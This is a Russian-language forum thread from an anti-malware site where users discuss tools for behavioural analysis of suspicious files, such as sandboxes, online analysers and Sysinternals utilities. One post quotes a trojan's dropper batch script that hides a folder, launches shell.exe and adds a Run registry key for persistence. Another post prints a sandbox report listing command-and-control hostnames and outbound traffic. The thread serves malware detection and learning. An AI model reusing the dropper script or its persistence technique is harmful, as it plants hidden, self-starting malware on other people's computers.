# Форум на русском языке  > Угрозы информационной безопасности  > Вредоносные программы  >  как узнать что делает вирус

## visokosnik

Мне частенько приходится встречатся с новыми модификациями вирусов, которые вылавливаются собственными руками ,
по принципу подозрительного месту расположения, атрибутов, типу запуска и т. д.
хотелось бы узнать как проверить-узнать
 каким образом работает этот зловред - 
тоесть к каким ip обращается, что отсылает .
какие службы запускает, где и что в реестре пишет, какие папки создает, какие службы запускает, блокирует ,использует?
Посоветуйте каким софтом для этого пользоваться





p.s.
вот к примеру нашел вчера вот это https://www.virustotal.com/file/4544...is/1341173867/
 и это точно троян или просто его часть

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Никита Соловьев

http://threatexpert.comhttp://camas.comodo.com/

----------


## visokosnik

с этим   •http://camas.comodo.com/ понятно 
а что здесь •http://threatexpert.com мельком взглянув вроде как пограммы для моих задач 
к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил


а есть ли софт что бы проверять все локально и без наличия интернета

----------


## Никита Соловьев

> а есть ли софт что бы проверять все локально и без наличия интернета


Есть песочницы, например http://www.sandboxie.com/




> к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил


http://www.threatexpert.com/submit.aspx  - на этой странице можно отправить файлы без апплетов.

Ещё он-лайн вариант: http://www.norman.com/security_center/security_tools/

Пробуйте.

----------


## visokosnik

очень понравилась работа http://camas.comodo.com/
а есть ли еще ему подобные сервисы

----------


## Никита Соловьев

Мне тоже из всех он-лайн анализаторов нравится COMODO. Все сервисы, ссылки на которые я здесь привёл выполняют аналогичные функции - анализ поведения.

----------


## thyrex

> вот к примеру нашел вчера


Детект 2/42 не есть гарантия наличия вируса  :Smiley:

----------


## Ilya Shabanov

Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал  :Smiley: 

Есть решений 2 в 1 - это Total Unstaller  http://www.martau.com/ Конечно авторы проги делали ее для другого  :Smiley:  Программ платная, но все сделано удобно.

*Добавлено через 41 секунду*

Но в реалтайме так конечно не отследишь, что вредонос делает.

----------

*Дeнис*

----------


## visokosnik

> Детект 2/42 не есть гарантия наличия вируса


согласен ,НО!!!
не раз бывало такое что сегодня 0 из 42 
завтра 5 из42
а через неделю 37 из 42

- - - Добавлено - - -

подскажите а как в комоду отправить фаил shell.exe который запускается батником


```
@echo off
set ztmp=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
set MYFILES=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\afolder
set bfcec=t18807.exe
attrib +h C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
@echo off
copy shell.exe %temp%\afolder
%temp%\afolder\shell.exe -2  
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "shell" /d "%temp%\afolder\shell.exe -2" /t REG_SZ /f >nul
attrib +h %temp%\afolder
```

то есть если shell.exe запускать без параметров, он ни каких действий делать не будет, а
с такими параметрами shell.exe -2  
покажет себя во всей красе


P.S.хитрый троянчик

----------


## Ilya Shabanov

> не раз бывало такое что сегодня 0 из 42 
> завтра 5 из42
> а через неделю 37 из 42


Бывает так, но бывает и иначе. Что послезавтра становится 7-10 и дальше не наращивается кол-во. 

Все дело в том, что куча вендоров тупо паразитируют на коллегах. Смотрят на конкурентов и добавляют автоматом детект себе. Увы, таких компаний много. Поэтому  не нужно ориентировать на массу. ИМХО *правильнее смотреть на выборку из 7-10 наиболее авторитетных вендора, которые сами проводят анализ и имеют свои базы знаний* (включая облачные).

----------


## visokosnik

именно поэтому я открыл эту тему
что бы самому  по действиям файла ,убедится есть ли в нем зловредный код , а не тупо смотреть на результаты virustotal
вот к примеру последний из пойманных


```
#

Filename(s)

File Size

File MD5

Alias / Other Info

 

1
 
%Temp%\afolder\shell.exe 

11,781 bytes
 
0x70B23E4AD55DE99EBB65720A436069F8
 
Trojan.Win32.Swrort [Ikarus]
 


2
 
[file and pathname of the sample #1] 

69,504 bytes
 
0xFE90B0F3A569B2DB346DFB620D4E5674
 
Win32.SuspectCrc [Ikarus]
 

The following directories were created:
 %Temp%\afolder
 %Temp%\ztmp
 
 





Memory Modifications

 There were new processes created in the system:
 



Process Name

Process Filename

Main Module Size

 

shell.exe

%Temp%\afolder\shell.exe

28,672 bytes

 

[filename of the sample #1]

[file and pathname of the sample #1]

10,371,072 bytes

Registry Modifications

 The newly created Registry Value is:
 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
 shell = "%Temp%\afolder\shell.exe -2"
 
so that shell.exe runs every time Windows starts

Other details

 To mark the presence in the system, the following Mutex object was created:
 )!VoqA.I4
 The following Host Names were requested from a host database:
 fad.no-ip.info
 sudo.no-ip.info
 ser.no-ip.info
 brutal.no-ip.info
 There was a registered attempt to establish connection with the remote host. The connection details are:

Remote Host

Port Number

fad.no-ip.info

443
Outbound traffic

 There was an outbound traffic produced on port 443:
 
00000000 | E570 6780 DE78 F14E 89C7 3DA4 3AA9 4333 | .pg..x.N..=.:.C3
00000010 | AECF 0415 A67F AE05 C4C0 2270 64E5 6A3E | .........."pd.j>
00000020 | 559E 8160 8D5E 9BB3 6712 726E 721F 1677 | U..`.^..g.rnr..w
00000030 | 57F1 C6F0 E209 EFBD 9BD4 972C 9CB3 4753 | W..........,..GS
00000040 | E1D0 2E6A 92EF 5A4D 61D3 C03C 7E66 BAE5 | ...j..ZMa..<~f..
00000050 | 65E6 D851 4581 6B89 519A 4EC6 61F3 EFB6 | e..QE.k.Q.N.a...
00000060 | D8E6 71DB EDE6 C172 3A9D C1CB CE6B 6DA4 | ..q....r:....km.
00000070 | BA61 39E1 689A 95A4 6077 0FFF 7A3E 6821 | .a9.h...`w..z>h!
00000080 | 072C BD41 6085 93A8 623F BF45 D6D7 C3B3 | .,.A`...b?.E....
00000090 | DB0C F51E CFF2 7BA6 7BDA E715 877B 31BA | ......{.{....{1.
000000A0 | 70D8 5EAB 7B67 FC57 55CE 8C24 5D9E F9B8 | p.^.{g.WU..$]...
000000B0 | E897 7A06 685A AD6E 1DE4 5CBA 7123 8156 | ..z.hZ.n..\.q#.V
000000C0 | 04D8 2F87 78C6 1286 F615 D3B3 D6C8 1A86 | ../.x...........
000000D0 | 9358 C19F 0D12 C7DC E033 0FE0 29CE E978 | .X.......3..)..x
000000E0 | 6A72 33B4 4F3F 83F1 BE8A C725 0AB6 AE4C | jr3.O?.....%...L
000000F0 | D9D2 1FCD 7C36 3595 304B 1EFE 20D8 6332 | ....|65.0K.. .c2
```


хотя на вирустотале https://www.virustotal.com/file/db29...07c6/analysis/
промолчали самые известные
avira
avast
avg
DrWeb
Kaspersky
NOD32
и тд

а вот результаты комоды
http://camas.comodo.com/cgi-bin/subm...cf5a90e70007c6

вот так ведь сразу видно что это бекдор

----------


## PavelA

> Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал


утилиты от Матусека здорово помогают в этом деле.

----------


## visokosnik

> утилиты от Матусека здорово помогают в этом деле.


а кто токой Матусека? можно поподробней

----------


## Никита Соловьев

> а кто токой Матусека? можно поподробней


Не кто, а что.  :Smiley: 

*matousec.com*

----------


## PavelA

Я немного ошибся и имел, конечно, в виду другую известную личность: Марка Русиновича, ныне сотрудника МС. Его блог, кстати есть на русском, содержит много информации по изучению различных программ.

----------


## Ilya Shabanov

Слушал тренинг Марка, где он показывал как при помощи только его утилит SysInternals можно обнаружить подозрительные процессы и удалить их. Никаких других средств он не использовал при этом.

----------

*Sandor*

----------


## Владимир Клименко

Здравствуйте.
Только что мне один человек сбросил файл под видом песни, но с разрешением *.exe, прогнал его через Comodo и вот результат http://camas.comodo.com/cgi-bin/subm...47f8627fca443f

Я не спец, но хотелось бы узнать, что эти результаты тестов говорят? Расшифруйте, пожалуйста.

З.Ы. 
   "Keys Created
• Keys Changed
• Keys Deleted"
Это значит создание, изменение и удаление паролей?

----------


## Никита Соловьев

> Это значит создание, изменение и удаление паролей?


Нет, это означает создание, изменение или удаление ключей системного реестра.
Из этого отчёта видно, что программа осуществляет HTTP запрос на определённый сайт (указан в таблице).

Если вас интересуют подробности о данной вредоносной программы, вы можете прислать её нам и получить ответ в соответствующей теме.

----------

